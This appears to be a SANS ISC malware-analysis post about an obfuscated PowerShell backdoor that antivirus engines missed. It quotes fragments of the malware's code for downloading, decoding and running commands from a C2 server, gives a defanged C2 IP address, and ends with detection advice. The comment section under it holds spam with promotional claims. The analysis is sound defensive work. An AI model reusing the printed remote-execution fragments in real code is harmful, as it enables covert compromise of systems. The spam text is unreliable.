Simple but Undetected PowerShell Backdoor
For a while, most security people agree on the fact that antivirus products are not enough for effective protection against malicious code. If they can block many threats, some of them remain undetected by classic technologies. Here is another example with a simple but effective PowerShell backdoor that I spotted yesterday. The file has been uploaded on VT (SHA256:4cd82b6cbd3e20fc8a9a0aa630d2a866d32cfb60e76b032191fda5d48720a64d) and received a score of ... 0/57! [1].
The script is pretty well obfuscated and hides a simple backdoor. The technique is string pollution with garbage characters that are removed with a split() to create an array and refer to specific elements:
PS C:\Users\REM> (("103AN449AN24AN445AN72AN796AN976AN159AN40AN26" -split "AN")[4]) 72
The C2 server return JSON data that I parsed to extract the code to execute through Invoke-Expression:
function ConvertFrom-JSON20([object] $item){ add-type -assembly system.web.extensions; $ps_js=new-object system.web.script.serialization.javascriptSerializer; $ps_js.MaxJsonLength = 99999999 return ,$ps_js.DeserializeObject($item); } $res = xor $res $cmp $res = $enc.GetString($res); $res = ConvertFrom-JSON20($res); $script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($res.script)); $script = [Scriptblock]::Create($script); Invoke-Command -ScriptBlock $script -ArgumentList $res.args;
All communications are XOR'd (there is a xor() function to perform a multi-byte encoding).
The session with the C2 server (hxxp://45[.]77[.]127[.]230:8888)[2] is established and maintained based on the infected system UUID:
$UUID = (get-wmiobject Win32_ComputerSystemProduct).uuid; $xorkey = $enc.GetBytes($cmp) $data = xor $enc.GetBytes($UUID) $xorkey;
Finally, the backdoor is launched in a PowerShell RunSpace:
$rs = [runspacefactory]::CreateRunspace() $rs.ApartmentState = "STA" $rs.ThreadOptions = "ReuseThread" $rs.Open() $rs.SessionStateProxy.SetVariable("h",$host) $ps = [PowerShell]::Create() $ps.Runspace = $rs $ps.AddScript($script) | out-null $ps.AddArgument($srv) | out-null $ps.AddArgument($cmp) | out-null $res = $ps.BeginInvoke()
Based on the script code, even if it's not flagged as malicious by regular AV engines, it's pretty easy to spot the malicious activity via an EDR tool or Microsoft Sysmon: PowerShell should not:
- perform HTTP connections on non-standard ports
- connect to IP addresses
- perform HTTP connection outside of the perimeter or to host not listed in an allowlist.
[1] https://www.virustotal.com/gui/file/4cd82b6cbd3e20fc8a9a0aa630d2a866d32cfb60e76b032191fda5d48720a64d/detection
[2] https://isc.sans.edu/ipinfo.html?ip=45.77.127.230
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments
www
Nov 17th 2022
6 months ago
EEW
Nov 17th 2022
6 months ago
qwq
Nov 17th 2022
6 months ago
mashood
Nov 17th 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
5 months ago
isc.sans.edu
Dec 3rd 2022
5 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
isc.sans.edu
Dec 26th 2022
5 months ago
isc.sans.edu
Dec 26th 2022
5 months ago